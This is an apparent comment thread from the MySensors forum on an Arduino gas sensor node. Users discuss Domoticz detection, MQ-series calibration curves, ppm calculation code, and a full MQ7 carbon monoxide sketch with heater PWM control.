C<$FIG_Config::fig/CGI/Html> directory. The template file is presumed to have a type suffix of C<php>. If the template is coming from a web server, any include files or other PHP commands will already have been executed by the time the file reaches us. If the template is coming from the file system, the suffix has no operational effect: the template file is read in unaltered. =cut #: Constructor TemplateObject->new(); =head2 Public Methods =head3 new C<< my $to = FIG_CGI->new($cgi, $type => $name, $request); >> Construct a new template object for the current script. Currently, only Sprout uses templates. A template name consists of a base,. =over 4 =item cgi CGI object for the current script. =item type Template type, usually either C<php> or C<html>. The template type is used as the file name suffix. =item name Base name of the template. =item request (optional) Request code for the script. If specified, the request code is joined to the base name to compute the template name. =back =cut sub new { # Get the parameters. my ($class, $cgi, $type, $name, $request) = @_; # Declare the template name variable. my $template = ""; # Check for Sprout mode. if (is_sprout($cgi)) { # Here we're in Sprout, so we have a template. First, we compute # the template name. my $requestPart = ($request ? "_$request" : ""); $template = "${name}_tmpl$requestPart.$type"; # Now we need to determine the template type and prefix the source location # onto it. if ($FIG_Config::template_url) { $template = "$FIG_Config::template_url/$template"; } else { $template = "<<$FIG_Config::fig/CGI/Html/$template"; } } # Now $template is either a null string (FALSE) or the name of the # template (TRUE). We are ready to create the return object. my $retVal = { template => $template, cgi => $cgi, }; # Next we add the object that will be accepting the HTML strings. if ($template) { $retVal->{varHash} = {}; } else { $retVal->{html} = []; } # Return the result. bless $retVal, $class; return $retVal; } =head3 mode C<< my $flag = $to->mode(); >> Return TRUE if a template is active, else FALSE. =cut sub mode { # Get the parameters. my ($self) = @_; # Return the result. return ($self->{template} ? 1 : 0); } =head3 raw C<< my $flag = $to->raw(); >> Return TRUE if we're accumulating raw HTML, else FALSE. =cut sub raw { # Get the parameters. my ($self) = @_; # Return the result. return ($self->{template} ? 0 : 1); } =head3 add C<< $to->add($name => $html); >> or C<< $to->add($html); >> Add HTML to the template data using the specified name. If a template is in effect, the data will be put into a variable hash. If raw HTML is being accumulated, the data will be added to the end of the HTML list. In the second form (without the name), the text is discarded in template mode and added to the HTML in raw mode. =over 4 =item name (optional) Name of the variable to be replaced by the specified HTML. If omitted, the HTML is discarded if we are in template mode. =item html HTML string to be put into the output stream. Note that if it is guaranteed that a template is to be used, references to lists of text or hashes may also be passed in, depending on the features used by the template. =back =cut sub add { # Get the parameters. my ($self, $name, $html) = @_; # Adjust the parameters if no name was specified. if (! defined($html)) { $html = $name; $name = ""; } # Check the mode. if ($self->mode) { # Here we're using a template. We only proceed if a name was specified. if ($name) { $self->{varHash}->{$name} = $html; } } else { # No template: we're just accumulating the HTML in a list. push @{$self->{html}}, $html; } } =head3 append C<< $to->append($name, $html); >> Append HTML to a named variable. Unlike L</add>, this method will not destroy a variable's existing value; instead, it will concatenate the new data at the end of the old. =over 4 =item name Name of the variable to which the HTML text is to be appended. =item html HTML text to append. =back =cut sub append { # Get the parameters. my ($self, $name, $html) = @_; # Check the mode. if ($self->mode) { # Template mode, so we check for the variable. my $hash = $self->{varHash}; if (exists $hash->{$name}) { $hash->{$name} .= $html; } else { $hash->{$name} = $html; } } else { # Raw mode. push @{$self->{html}}, $html; } } =head3 titles C<< to->titles($parameters); >> If no template is in use, generate the plain SEED header. If a template is in use, get the version, peg ID, and message of the day for use in the template. This subroutine provides a uniform method for starting a web page regardless of mode. =over 4 =item parameters Reference to a hash containing the heading parameters. These are as follows. =over 8 =item fig_object Fig-like object used to access the data store. =item peg_id ID of the current protein. =item table_style Style to use for tables. =item fig_disk Directory of the FIG disk. =item form_target Target script for most forms. =back =back =cut sub titles { # Get the parameters. my ($self, $parameters) = @_; my $cgi = $self->{cgi}; if ($self->{template}) { # In template mode, we get useful stuff from the framework. First, the message # of the day. $self->add(motd => FigWebServices::SeedComponents::Framework::get_motd($parameters)); # Now the version. $self->add(version => FigWebServices::SeedComponents::Framework::get_version({fig => $parameters->{fig_object}, fig_disk => $parameters->{fig_disk}})); # Next, the location tag. $self->add(location_tag => $self->{cgi}->url()); # Finally the protein (if any). if (exists $parameters->{peg_id}) { $self->add(feature_id => $parameters->{peg_id}); } } else { # No template, so we pull in the plain header. $self->add($cgi->start_html(-title => $parameters->{title})); $self->add(header => FigWebServices::SeedComponents::Framework::get_plain_header($parameters)); } } =head3 finish C<< my $webPage = $to->finish(); >> Format the template information into a web page. The HTML passed in by the L</add> methods is assembled into the proper form and returned to the caller. =cut sub finish { # Get the parameters. my ($self) = @_; # Declare the return variable. my $retVal; # Check the mode. if ($self->{template}) { # Here we have to process a template. $retVal = PageBuilder::Build($self->{template}, $self->{varHash}, "Html"); } else { # Here we need to assemble raw HTML in sequence. First, we check for the # closing HTML tags. If the last line is a body close, we only need to add # the html close. If it's not a body close or an html close, we need to # add both tags. my @html = @{$self->{html}}; if ($html[$#html] =~ m!/body!i) { push @html, "</html>"; } elsif ($html[$#html] !~ m!/html!i) { push @html, "</body></html>"; } # Join the lines together to make a page. $retVal = join("\n", @html); } # Return the result. return $retVal; } 1;
http://biocvs.mcs.anl.gov/viewcvs.cgi/FigKernelPackages/TemplateObject.pm?revision=1.6&view=markup&pathrev=mgrast_rel_2008_0917
CC-MAIN-2020-24
refinedweb
1,486
67.25
Programmers see in C++0x standard an opportunity to use lambda-functions and other entities I do not quite understand :). But personally I see convenient means in it that allow us to get rid of many 64-bit errors. Consider a function that returns "true" if at least one string contains the sequence "ABC". typedef vector<string> ArrayOfStrings; bool Find_Incorrect(const ArrayOfStrings &arrStr) { ArrayOfStrings::const_iterator it; for (it = arrStr.begin(); it != arrStr.end(); ++it) { unsigned n = it->find("ABC"); if (n != string::npos) return true; } return false; }; This function is correct when compiling the Win32 version but fails when building the application in Win64. mode. Consider another example of using the function: #ifdef IS_64 const char WinXX[] = "Win64"; #else const char WinXX[] = "Win32"; #endif int _tmain(int argc, _TCHAR* argv[]) { ArrayOfStrings array; array.push_back(string("123456")); array.push_back(string("QWERTY")); if (Find_Incorrect(array)) printf("Find_Incorrect (%s): ERROR!\n", WinXX); else printf("Find_Incorrect (%s): OK!\n", WinXX); return 0; } Find_Incorrect (Win32): OK! Find_Incorrect (Win64): ERROR! The error here is related to choosing the type "unsigned" for "n" variable although the function find() returns the value of string::size_type type. In the 32-bit program, the types string::size_type and unsigned coincide and we get the correct result. In the 64-bit program, these types do not coincide. As the substring is not found, the function find() returns the value string::npos that equals 0xFFFFFFFFFFFFFFFFui64. This value gets cut to 0xFFFFFFFFu and is written into the 32-bit variable. As a result, the condition 0xFFFFFFFFu == 0xFFFFFFFFFFFFFFFFui64 is always false and we get the message "Find_Incorrect (Win64): ERROR!". We may correct the code using the type string::size_type. bool Find_Correct(const ArrayOfStrings &arrStr) { ArrayOfStrings::const_iterator it; for (it = arrStr.begin(); it != arrStr.end(); ++it) { string::size_type n = it->find("ABC"); if (n != string::npos) return true; } return false; }; Now the code works as it should though it is too long and not very nice to constantly add the type string::size_type. You may redefine it through typedef but still it looks somehow complicated. Using C++0x we can make the code much smarter and safer. Let us use the key word "auto" to do that. Earlier, this word meant that the variable was created on the stack and it was implied if you had not specified something different, for example, register. Now the compiler identifies the type of a variable defined as "auto" on its own, relying on the function initializing this variable. Note that an auto-variable cannot store values of different types during one instance of program execution. C++ remains a static typified language and "auto" only makes the compiler identify the type on its own: once the variable is initialized, its type cannot be changed. Let us use the key word "auto" in our code. The project was created in Visual Studio 2005 while C++0x standard gets supported only beginning with Visual Studio 2010. So I chose Intel C++ compiler included into Intel Parallel Studio 11.1 and supporting C++0x standard to perform compilation. The option of enabling C++0x support is situated in the Language section and reads "Enable C++0x Support". As you may see in Figure 1, this option is Intel Specific. Figure 1 - Support of C++0x standard The modified code looks as follows: bool Find_Cpp0X(const ArrayOfStrings &arrStr) { for (auto it = arrStr.begin(); it != arrStr.end(); ++it) { auto n = it->find("ABC"); if (n != string::npos) return true; } return false; }; Consider the way the variable "n" is defined now. Smart, isn't it? It also eliminates some errors including 64-bit ones. The variable "n" will have exactly the same type returned by the function find(), i.e. string::size_type. Note also that there is no string with the iterator definition: ArrayOfStrings::const_iterator it; It is not very smart to define the variable "it" inside the loop (for it is rather lengthy). So the definition was taken out of the loop. Now the code is short and accurate: for (auto it = arrStr.begin(); ......) Let us examine one more key word "decltype". It allows you to define the type of a variable relying on the type of another variable. If we had to define all the variables in our code beforehand, we could write it in this way: bool Find_Cpp0X_2(const ArrayOfStrings &arrStr) { decltype(arrStr.begin()) it; decltype(it->find("")) n; for (it = arrStr.begin(); it != arrStr.end(); ++it) { n = it->find("ABC"); if (n != string::npos) return true; } return false; }; Of course, it is senseless in our case but may be useful in some others. Unfortunately (or fortunately for us :-), the new standard does not eliminate already existing defects in the code despite really simplifying the process of writing safe 64-bit code. To be able to fix an error with the help of memsize-тип or "auto" you must find this error at first. So, the tool Viva64 will not become less relevant with the appearance of standard C++0x. P.S. You may download the project with the code here.
http://www.viva64.com/en/b/0060/
CC-MAIN-2014-35
refinedweb
839
56.76
Tools for stress testing applications. Project description Stress testing of applications can be done in lots of different ways. This package provides an easy to use tool to stress test applications which take files as parameters. Editors, image viewers, compilers, and many more classes of apps come to mind. The stress test is based on a given set of files, binary or text. Those files are taken randomly and some bytes are modified also randomly (fuzzing). Then the application gets executed with the fuzzed file. Repeating this over and over again stresses the robustness for defective input data of the application. Tutorial and API documentation can be found on ReadTheDocs. What’s new? Now you can run your tests in multiple processes. Test results are combined and printed. Installation The easiest way to install is via easy_install or pip $ pip install fuzzing There are feature related tests that can be run with behave and unit tests runnable with pytest or nosetest. Example from fuzzing.fuzzer import FuzzExecutor # Files to use as initial input seed. file_list = ["./features/data/t1.pdf", "./features/data/t3.pdf", "./features/data/t2.jpg"] # List of applications to test. apps_under_test = ["/Applications/Adobe Reader 9/Adobe Reader.app/Contents/MacOS/AdobeReader", "/Applications/PDFpen 6.app/Contents/MacOS/PDFpen 6", "/Applications/Preview.app/Contents/MacOS/Preview", ] number_of_runs = 13 def test(): fuzz_executor = FuzzExecutor(apps_under_test, file_list) fuzz_executor.run_test(number_of_runs) return fuzz_executor.stats def main(): stats = test() print(stats) Using pre-built test runner and configuration For convenience a test runner is provided which takes a test configuration. Example of a configuration YAML file: version: 1 seed_files: ['requirements.txt', 'README.rst'] applications: ['MyFunnyApp', 'AdobeReader'] runs: 800 processors: 4 processes: 10 Then call the test runner in a terminal session: $ run_fuzzer.py test.yaml This will execute the tests as configured and print the test result when done: $ run_fuzzer.py test.yaml Starting up ... ... finished Test Results: MyFunnyApp succeeded: 4021 failed: 95 AdobeReader succeeded: 3883 failed: 1 - License: MIT Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/fuzzing/
CC-MAIN-2020-29
refinedweb
355
51.14
ASP of the code samples that I write, I create an instance of a DataContext object, but I never properly dispose of it. Is this wrong? The DataContext class implements the IDisposable interface. In general, if a class implements the IDisposable interface, then that is good evidence that you should call Dispose(). But keep reading. Classes that implement the IDisposable interface typically use resources that cannot be cleaned up by the .NET framework garbage collector. Calling the IDisposable.Dispose() method executes code that explicitly releases a precious resource back into the world. A prime example of a class that implements the IDisposable interface is the SqlConnection class. A SqlConnection class uses a Microsoft SQL Server database connection. Because SQL Server supports a limited number of connections, it is important to release a connection as quickly as possible. Typically, you do not call the Dispose() method directly. Typically, you take advantage of a Using statement in your code like this: C# Code using (var con = new SqlConnection(conString)) { var cmd = new SqlCommand("SELECT * FROM Products"); var reader = cmd.ExecuteReader(); } VB.NET Code Using con = New SqlConnection(conString) Dim cmd = New SqlCommand("SELECT * FROM Products") Dim reader = cmd.ExecuteReader() End Using A Using statement calls the Dispose() method at the end of the Using block automatically. The Using statement calls the Dispose() method even if there was an error in the code. Dispose of the DataContext Because the DataContext implements IDisposable, it would seem like the right way to use the DataContext in a controller is like Listing 1. In Listing 1, a DataContext is used within a Using statement. Listing 1 – BadController.cs using System.Linq; using System.Web.Mvc; using MvcFakes; using Tip34.Models; namespace Tip34.Controllers { public class BadController : Controller { private IDataContext _dataContext; public BadController() : this(new DataContextWrapper("dbcon", "~/Models/Movie.xml")){ } public BadController(IDataContext dataContext) { _dataContext = dataContext; } public ActionResult Index() { using (_dataContext) { var table = _dataContext.GetTable<Movie>(); var movies = from m in table select m; return View("Index", movies); } } } } The controller in Listing 1 is taking advantage of the IDataContext, DataContextWrapper, and FakeDataContext objects discussed in the previous tip: By taking advantage of these objects, you can easily test your MVC application. Within the Index() method, the DataContext is used within a Using statement. The Using statement causes the Dispose() method to be called on the DataContext object (The DataContextWrapper.Dispose() method delegates to the DataContext.Dispose() method). You can use the controller in Listing 1 with a typed view. The typed view casts the ViewData.Model property to an instance of IQueryable. The code-behind for the typed view is contained in Listing 2. Listing 2 -- \Views\Bad\Index.aspx.cs using System.Linq; using System.Web.Mvc; using Tip34.Models; namespace Tip34.Views.Bad { public partial class Index : ViewPage<IQueryable<Movie>> { } } Unfortunately, however, the code in Listing 1 does not work. If you try to execute this code, you get the error displayed in Figure 1. You receive the error: “Cannot access a disposed object”. The problem is that the DataContext has already been disposed before the DataContext can be used in the view. Figure 1 – Error from early disposal One of the big benefits of using LINQ to SQL is that it supports deferred execution. A LINQ to SQL statement is not actually executed against the database until you start iterating through the results. Because the movie records are not accessed until they are displayed in the Index view, the DataContext is disposed before the records are retrieved from the database and you get the error. One easy way to fix the problem with the controller in Listing 1 is to pass the movies as a list instead of as an IQueryable. The modified Index() action method in Listing 3 does not cause an error: Listing 3 – HomeController.cs using System.Linq; using System.Web.Mvc; using MvcFakes; using Tip34.Models; namespace Tip34.Controllers { public class HomeController : Controller { private IDataContext _dataContext; public HomeController() : this(new DataContextWrapper("dbcon", "~/Models/Movie.xml")){ } public HomeController(IDataContext dataContext) { _dataContext = dataContext; } public ActionResult Index() { using (_dataContext) { var table = _dataContext.GetTable<Movie>(); var movies = from m in table select m; return View("Index", movies.ToList()); } } public ActionResult Details(int id) { using (_dataContext) { var table = _dataContext.GetTable<Movie>(); var movie = table.SingleOrDefault(m=>m.Id == id); return View("Details", movie); } } } } The only difference between the Index() method in Listing 3 and the Index() method in Listing 4 is that the ToList() method is called on the movies before the movies are passed to the view. The controller in Listing 3 also contains a Details() action that displays details for a particular movie. You do not need to do anything special when retrieving a single database record. LINQ to SQL does not used deferred execution when you retrieve a single record. If you change the typed view so that it expects a list instead of an IQueryable, then everything works fine: using System.Collections.Generic; using System.Web.Mvc; using Tip34.Models; namespace Tip34.Views.Home { public partial class Index : ViewPage<List<Movie>> { } } The modified controller now works because the ToList() method forces the LINQ to SQL statement to be executed against the database within the controller and not within the view. You can unit test the Home controller in Listing 3 just fine. The class in Listing 4 contains a unit test that verifies that the Index() method returns a set of database records. Listing 4 -- \Controllers\HomeControllerTest.cs using System.Collections.Generic; using System.Web.Mvc; using Microsoft.VisualStudio.TestTools.UnitTesting; using MvcFakes; using Tip34.Controllers; using Tip34.Models; namespace Tip34Tests.Controllers { [TestClass] public class HomeControllerTest { [TestMethod] public void Index() { // Create Fake DataContext var context = new FakeDataContext(); var table = context.GetTable<Movie>(); table.InsertOnSubmit(new Movie(1, "Star Wars")); table.InsertOnSubmit(new Movie(2, "King Kong")); context.SubmitChanges(); // Create Controller var controller = new HomeController(context); // Act ViewResult result = controller.Index() as ViewResult; // Assert var movies = (List<Movie>)result.ViewData.Model; Assert.AreEqual("Star Wars", movies[0].Title); } } } This unit test is taking advantage of the FakeDataContext class described in the previous tip to create an in-memory version of a DataContext. First, the unit test adds some fake database records to the FakeDataContext. Next, the Index() action is invoked and a result is returned. Finally, the ViewData contained in the result is compared against the fake database records. If the ViewData contains the first fake database record then the Index() action works correctly and success is achieved. Don’t Dispose of the DataContext In the previous section, I demonstrated how you can Dispose() of a DataContext within an MVC controller action. In this section, I question the necessity of doing this. When you call the DataContext Dispose() method, the DataContext delegates the call to the SqlProvider class. The SqlProvider class does two things. First, the SqlProvider calls the ConnectionManager.DisposeConnection() method which closes any open database connection associated with the DataContext. Second, the SqlProvider sets several objects to null (including the ConnectionManager). So, the most important consequence of calling the DataContext.Dispose() method is that any open connections associated with the DataContext get closed. This might seem really important, but it’s not. The reason that it is not important is that the DataContext class already manages its connections. By default, the DataContext class opens and closes a connection automatically. The DataContext object translates a LINQ to SQL query into a standard SQL database query and executes it. The DataContext object opens a database connection right before executing the SQL database query and closes the connection right after the query is executed (the connection is closed in the Finally clause of a Try..Catch block). If you prefer, you can manage the opening and closing of the database connection used by a DataContext yourself. You can use the DataContext.Connection property to explicitly open a connection and explicitly close the connection. Normally, however, you don’t do this. You let the DataContext take care of itself. Most often, when you call the Dispose() method on the DataContext object, any database connection associated with the DataContext object is already closed. The DataContext object has closed the database connection right after executing the database query. So, the Dispose() method really doesn't have anything to do. Therefore, you really don’t get any huge benefits from calling Dispose() on the DataContext object. The only slight benefit is that the Dispose() method sets several objects to null so that they can be collected earlier by the garbage collector. Unless you are worried about every byte used by your application, or you are tracking a huge number of objects with your DataContext, I wouldn’t worry too much about the memory overhead of the DataContext object. Summary In this tip, I demonstrated how you can call the Dispose() method when working with a DataContext object within an MVC controller. Next, I argued that there really isn’t a very compelling reason to want to call the Dispose() method. I plan to continue to be lazy about disposing any DataContext objects that I used within my MVC controllers.
http://weblogs.asp.net/stephenwalther/asp-net-mvc-tip-34-dispose-of-your-datacontext-or-don-t
CC-MAIN-2015-48
refinedweb
1,512
50.53
Renaming the Script Project in SSIS 2008 I found something interesting in SSIS 2008 today, and thought I’d share it. I was working with David Darden on a package that included a script task. In 2008, the Visual Studio Tools for Applications (VSTA) environment is used to edit script tasks. It exposes a few more details about the script task, including the project name. By default, it creates a rather long project name, as you can see in the screen shot below. (Yes, that is C#. It’s my preferred language, so expect to see more of it here now that it’s available in 2008). The namespace is based on the project name, so you get the same long value for it. While poking around in the script task’s expressions editor, we found the ScriptProjectName property. This property does not show up in the Properties window (F4), only in the expressions editor. By setting this, you can update the project name in the script. For example, setting this property to "NewScriptProjectName", as shown here: results in this showing up in the script project: There are a few caveats to this. One, if you do this after initially editing the script, the project name will be updated, but the namespace will remain the same. Two, you must save the package after setting the expression, in order for the expression to be applied. If you add the expression, then edit the script without saving, it will not use the new project name. So, if you want to name your script project with a friendly name, do the following: - Add the Script Task. - Add an expression to set the ScriptProjectName property to your desired value. - Save the package. - Now you can use the Edit Script button to edit the script project with the friendly name. I do want to point out that the name of the project has no real impact on functionality. The script will not run any differently if you do this. It’s purely for aesthetic purposes. But if the long, random looking project names bother you, it’s nice to know you can fix them. There is also a MSDN forum post here that details the steps to edit the namespace after the script has been edited for the first time. It’s a little easier to set it this way, though, so that it is handled up front.
http://agilebi.com/jwelch/2008/04/
CC-MAIN-2017-47
refinedweb
403
80.82
💬 Gas Sensor This thread contains comments for the article "Gas Sensor" posted on MySensors.org. Just a note for any Domoticz users who may try this sketch - it presents in the log, but is not available under 'Devices' to be added UNTIL it gets a reading > 0. My solution to that was to go put the node over the gas hob and let the gas run (unlit) for a few seconds so that it generated a reading Remember kids, gas is dangerous, stay safe. Where can I get chep MQ-138 sensor please? Have you looked at aliexpress? HI Gohan, Yes I did, seems that they are very expensive wherever I look. I'll wait on this one ofr now. Thanks for the suggestion though I believe it is on the cheap side. These price ranges are mainly for hobbyist sensor. The real calibrated ones are usually way more expensive. The cheap ones are only good to measure trends, not for the actual value. Please advise what would be curve for MQ135 sensor for CO2. Thank you. Sure, the curve is there. I am trying to make sense out of two points curve that is used in sketch for MQ2 sensor, CO gas. "point1: (lg200, 0.72), point2: (lg10000, 0.15)" while I see on the curve from datasheet (lg200, 5.2) and (lg10000, 1.3). That is why I am asking for help, sorry for not making it clear. Lack of support makes you think, so I figured out the "hidden" calculations in the sketch above and proposing the code modification to allow users to port the code to a different gas sensor using data taken directly from the sensor chart. Here are modified fragments of the code showing only CO curve for MQ2 sensor: float CO2Curve[4] = {0.8,200,2.2,10}; //two end points are taken from the curve with two coordinates for each point //in form of{Y1, X1,Y2, X2) where X is PPM axis, Y is Rs/Ro axis from the sensor chart for specifc gas //then equation X=(Y-b)/m is used, //where m is slope of the curve, b is Y axis intersept point float Slope = (log(pcurve(1)-log(pcurve(0))/(log(pcurve(3)-log(pcurve(2)); float Y_Intercept=log(pcurve(1)-Slope*log(pcurve(3); int MQGetPercentage(float rs_ro_ratio, float *pcurve) { { return (pow(10,((log(rs_ro_ratio)-Y_Intercept)/Slope))); } } I have found this sketch for MQ7 sensors /* This code was developed by the_3d6 from Ultimate Robotics (). License: you can use it for any purpose as long as you don't claim that you are its author and you don't alter License terms and formulations (lines 1-10 of this file). You can share modifications of the code if you have properly tested their functionality, including confirming correct sensor response on CO concentrations of 0-30ppm, 100-300ppm and 1000-10000ppm. If you can improve this code, please do so! You can contact me at aka.3d6@gmail.com */ //WARNING! Each sensor is different! //You MUST calibrate sensor manually and //set proper sensor_reading_clean_air value before using //it for any practical purpose! int time_scale = 8; //time scale: we altered main system timer, so now all functions like millis(), delay() etc //will think that time moves 8 times faster than it really is //to correct that, we use time_scale variable: //in order to make delay for 1 second, now //we call delay(1000*time_scale) void setTimer0PWM(byte chA, byte chB) //pins D5 and D6 { TCCR0A = 0b10110011; //OCA normal,OCB inverted, fast pwm TCCR0B = 0b010; //8 prescaler - instead of system's default 64 prescaler - thus time moves 8 times faster OCR0A = chA; //0..255 OCR0B = chB; } void setTimer2PWM(byte chA, byte chB) //pins D11 and D3 { TCCR2A = 0b10100011; //OCA,OCB, fast pwm TCCR2B = 0b001; //no prescaler OCR2A = chA; //0..255 OCR2B = chB; } void setTimer1PWM(int chA, int chB) //pins D9 and D10 { TCCR1A = 0b10100011; //OCA,OCB, fast pwm TCCR1B = 0b1001; //no prescaler OCR1A = chA; //0..1023 OCR1B = chB; } float opt_voltage = 0; byte opt_width = 240; //default reasonable value void pwm_adjust() //this function tries various PWM cycle widths and prints resulting //voltage for each attempt, then selects best fitting one and //this value is used in the program later { float previous_v = 5.0; //voltage at previous attempt float raw2v = 5.0 / 1024.0;//coefficient to convert Arduino's //analogRead result into voltage in volts for (int w = 0; w < 250; w++) { setTimer2PWM(0, w); float avg_v = 0; for (int x = 0; x < 100; x++) //measure over about 100ms to ensure stable result { avg_v += analogRead(A1); delay(time_scale); } avg_v *= 0.01; avg_v *= raw2v; Serial.print("adjusting PWM w="); Serial.print(w); Serial.print(", V="); Serial.println(avg_v); if (avg_v < 3.6 && previous_v > 3.6) //we found optimal width { float dnew = 3.6 - avg_v; //now we need to find if current one float dprev = previous_v - 3.6;//or previous one is better if (dnew < dprev) //if new one is closer to 1.4 then return it { opt_voltage = avg_v; opt_width = w; return; } else //else return previous one { opt_voltage = previous_v; opt_width = w - 1; return; } } previous_v = avg_v; } } float alarm_ppm_threshold = 100; //threshold CO concentration for buzzer alarm to be turned on, float red_threshold = 40; //threshold when green LED is turned on red turns on float reference_resistor_kOhm = 10.0; //fill correct resisor value if you are using not 10k reference float sensor_reading_clean_air = 600; //fill raw sensor value at the end of measurement phase (before heating starts) in clean air here! That is critical for proper calculation float sensor_reading_100_ppm_CO = -1; //if you can measure it //using some CO meter or precisely calculated CO sample, then fill it here //otherwise leave -1, default values will be used in this case float sensor_100ppm_CO_resistance_kOhm; //calculated from sensor_reading_100_ppm_CO variable float sensor_base_resistance_kOhm; //calculated from sensor_reading_clean_air variable byte phase = 0; //1 - high voltage, 0 - low voltage, we start from measuring unsigned long prev_ms = 0; //milliseconds in previous cycle unsigned long sec10 = 0; //this timer is updated 10 times per second, //when it will overflow, program might freeze or behave incorrectly. //It will happen only after ~13 years of operation. Still, //if you'll ever use this code in industrial application, //please take care of overflow problem unsigned long high_on = 0; //time when we started high temperature cycle unsigned long low_on = 0; //time when we started low temperature cycle unsigned long last_print = 0; //time when we last printed message in serial float sens_val = 0; //current smoothed sensor value float last_CO_ppm_measurement = 0; //CO concentration at the end of previous measurement cycle float raw_value_to_CO_ppm(float value) { if (value < 1) return -1; //wrong input value sensor_base_resistance_kOhm = reference_resistor_kOhm * 1023 / sensor_reading_clean_air - reference_resistor_kOhm; if (sensor_reading_100_ppm_CO > 0) { sensor_100ppm_CO_resistance_kOhm = reference_resistor_kOhm * 1023 / sensor_reading_100_ppm_CO - reference_resistor_kOhm; } else { sensor_100ppm_CO_resistance_kOhm = sensor_base_resistance_kOhm * 0.5; //This seems to contradict manufacturer's datasheet, but for my sensor it //looks quite real using CO concentration produced by CH4 flame according to //this paper: //my experiments were very rough though, so I could have overestimated CO concentration significantly //if you have calibrated sensor to produce reference 100 ppm CO, then //use it instead } float sensor_R_kOhm = reference_resistor_kOhm * 1023 / value - reference_resistor_kOhm; float R_relation = sensor_100ppm_CO_resistance_kOhm / sensor_R_kOhm; float CO_ppm = 100 * (exp(R_relation) - 1.648); if (CO_ppm < 0) CO_ppm = 0; return CO_ppm; } void startMeasurementPhase() { phase = 0; low_on = sec10; setTimer2PWM(0, opt_width); } void startHeatingPhase() { phase = 1; high_on = sec10; setTimer2PWM(0, 255); } void setLEDs(int br_green, int br_red) { if (br_red < 0) br_red = 0; if (br_red > 100) br_red = 100; if (br_green < 0) br_green = 0; if (br_green > 100) br_green = 100; float br = br_red; br *= 0.01; br = (exp(br) - 1) / 1.7183 * 1023.0; float bg = br_green; bg *= 0.01; bg = (exp(bg) - 1) / 1.7183 * 1023.0; if (br < 0) br = 0; if (br > 1023) br = 1023; if (bg < 0) bg = 0; if (bg > 1023) bg = 1023; setTimer1PWM(1023 - br, 1023 - bg); } void buzz_on() { setTimer0PWM(128, 128); } void buzz_off() { setTimer0PWM(255, 255); } void buzz_beep() { byte sp = sec10 % 15; if (sp == 0) buzz_on(); if (sp == 1) buzz_off(); if (sp == 2) buzz_on(); if (sp == 3) buzz_off(); if (sp == 4) buzz_on(); if (sp == 5) buzz_off(); } void setup() { //WARNING! Each sensor is different! //You MUST calibrate sensor manually and //set proper sensor_reading_clean_air value before using //it for any practical purpose! pinMode(5, OUTPUT); pinMode(6, OUTPUT); pinMode(3, OUTPUT); pinMode(9, OUTPUT); pinMode(10, OUTPUT); pinMode(A0, INPUT); pinMode(A1, INPUT); setTimer1PWM(1023, 0); analogReference(DEFAULT); Serial.begin(115200); pwm_adjust(); Serial.print("PWM result: width "); Serial.print(opt_width); Serial.print(", voltage "); Serial.println(opt_voltage); Serial.println("Data output: raw A0 value, heating on/off (0.1 off 1000.1 on), CO ppm from last measurement cycle"); //beep buzzer in the beginning to indicate that it works buzz_on(); delay(100 * time_scale); buzz_off(); delay(100 * time_scale); buzz_on(); delay(100 * time_scale); buzz_off(); delay(100 * time_scale); buzz_on(); delay(100 * time_scale); buzz_off(); delay(100 * time_scale); startMeasurementPhase(); //start from measurement } void loop() { //WARNING! Each sensor is different! //You MUST calibrate sensor manually and //set proper sensor_reading_clean_air value before using //it for any practical purpose! unsigned long ms = millis(); int dt = ms - prev_ms; //this condition runs 10 times per second, even if millis() //overflows - which is required for long-term stability //when millis() overflows, this condition will run after less //than 0.1 seconds - but that's fine, since it happens only once //per several days if (dt > 100 * time_scale || dt < 0) { prev_ms = ms; //store previous cycle time sec10++; //increase 0.1s counter if (sec10 % 10 == 1) //we want LEDs to blink periodically { setTimer1PWM(1023, 1023); //blink LEDs once per second //use %100 to blink once per 10 seconds, %2 to blink 5 times per second } else //all other time we calculate LEDs and buzzer state { int br_red = 0, br_green = 0; //brightness from 1 to 100, setLEDs function handles converting it into timer settings if (last_CO_ppm_measurement <= red_threshold) //turn green LED if we are below 30 PPM {//the brighter it is, the lower concentration is br_red = 0; //turn off red br_green = (red_threshold - last_CO_ppm_measurement)*100.0 / red_threshold; //the more negative is concentration, the higher is value if (br_green < 1) br_green = 1; //don't turn off completely } else //if we are above threshold, turn on red one { br_green = 0; //keep green off br_red = (last_CO_ppm_measurement - red_threshold)*100.0 / red_threshold; //the higher is concentration, the higher is this value if (br_red < 1) br_red = 1; //don't turn off completely } if (last_CO_ppm_measurement > alarm_ppm_threshold) //if at 50 seconds of measurement cycle we are above threshold buzz_beep(); else buzz_off(); setLEDs(br_green, br_red); //set LEDs brightness } } if (phase == 1 && sec10 - high_on > 600) //60 seconds of heating ended? startMeasurementPhase(); if (phase == 0 && sec10 - low_on > 900) //90 seconds of measurement ended? { last_CO_ppm_measurement = raw_value_to_CO_ppm(sens_val); startHeatingPhase(); } float v = analogRead(A0); //reading value sens_val *= 0.999; //applying exponential averaging using formula sens_val += 0.001*v; // average = old_average*a + (1-a)*new_reading if (sec10 - last_print > 9) //print measurement result into serial 2 times per second { last_print = sec10; Serial.print(sens_val); Serial.print(" "); Serial.print(0.1 + phase * 1000); Serial.print(" "); Serial.println(last_CO_ppm_measurement); } } from this guide I was wondering if it could be used on a MySensors node even with all those timers modifications - borneo1910 last edited by Does anyone know if any of these sensors can be used to detect vaporized white mineral oil? Vaporized oil is very messy, I don't think they would any good as it is not volatile - borneo1910 last edited by Does it change things if it's actually atomized and not vaporized? What I'm saying is that it is not a gas that dissolves in air, it is more particulate matter suspended in the air so an optical sensor is probably better given that the sensor could last as oil tends to stick to stuff - user2684 Contest Winner last edited by I spent the last few days trying to get a sense out of the black magic behind the calculations used for this sensor. I got the math now but still there is something I feel like it is not completely accurate with the current implementation. First of all the resulting ppm seems like a sort of normalized value; since I know e.g. CO2 ppm in clean air is around 400, the code seems not to take this into consideration. Also, configure it with a different MQ sensor doesn't seem an easy task. For these reasons I've tried starting from scratch, inspired by. Starting point is the power function y = a*x^b. The way to make the code more generic is to let the user provide the coordinates of two points (like @APL2017 was suggesting a while ago) which is an easy task and let the code solve the two equations and derive the values of a and b. Then, since ppm = a(rs/ro)^b, with a known value of ppm (e.g. the concentration in clear air of the gas, for co2 is 411), the equation can be solved for Ro by measuring Rs from the adc. Once a, b and Ro are known, the ppm comes naturally by solving again ppm = a(rs/ro)^b. I'm not sure this is better than the other methods but at least I get the same results from the blog above, both in terms of values of a, 